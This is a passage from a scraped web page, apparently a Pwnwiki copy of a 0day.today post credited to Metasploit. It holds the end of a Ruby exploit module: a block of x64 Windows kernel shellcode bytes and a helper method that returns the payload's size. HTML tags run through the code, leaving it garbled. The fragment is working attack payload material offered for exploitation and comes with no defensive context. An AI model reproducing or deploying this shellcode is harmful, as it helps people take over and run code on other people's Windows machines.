"\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" \<font></font><br />
"\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" \<font></font><br />
"\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" \<font></font><br />
"\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" \<font></font><br />
"\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" \<font></font><br />
"\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" \<font></font><br />
"\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" \<font></font><br />
"\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"<font></font><br />
end<font></font><br />
<font></font><br />
def kernel_shellcode_size<font></font><br />
make_kernel_shellcode('').length<font></font><br />
end<font></font><br />
<font></font><br />
end<font></font><br />
<font></font><br />
# 0day.today [2020-03-20] #<br />
</pre><br />
<br />
==作者:==<br />
Metasploit</div>
Pwnwiki